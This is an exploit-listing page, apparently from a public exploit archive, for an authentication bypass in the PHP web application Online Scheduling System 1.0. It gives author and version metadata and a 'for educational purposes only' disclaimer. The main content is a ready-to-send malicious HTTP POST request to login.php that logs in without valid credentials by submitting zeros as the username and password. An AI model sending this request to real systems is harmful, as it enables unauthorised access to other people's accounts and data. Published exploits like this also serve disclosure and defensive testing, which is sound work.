Online scheduling system 1.0 authentication bypass Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-05-01 | Type : webapps | Platform : php
This exploit / vulnerability Online scheduling system 1.0 authentication bypass is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Online Scheduling System 1.0 - Authentication Bypass
# Exploit Author: Bobby Cooke
# Date: 2020-04-30
# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4

# Malicious POST Request to https://TARGET/Online%20Scheduling%20System/login.php HTTP/1.1
POST /Online%20Scheduling%20System/login.php HTTP/1.1
Host: TARGET
Connection: close
Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60

username=0&password=0&lgn=Login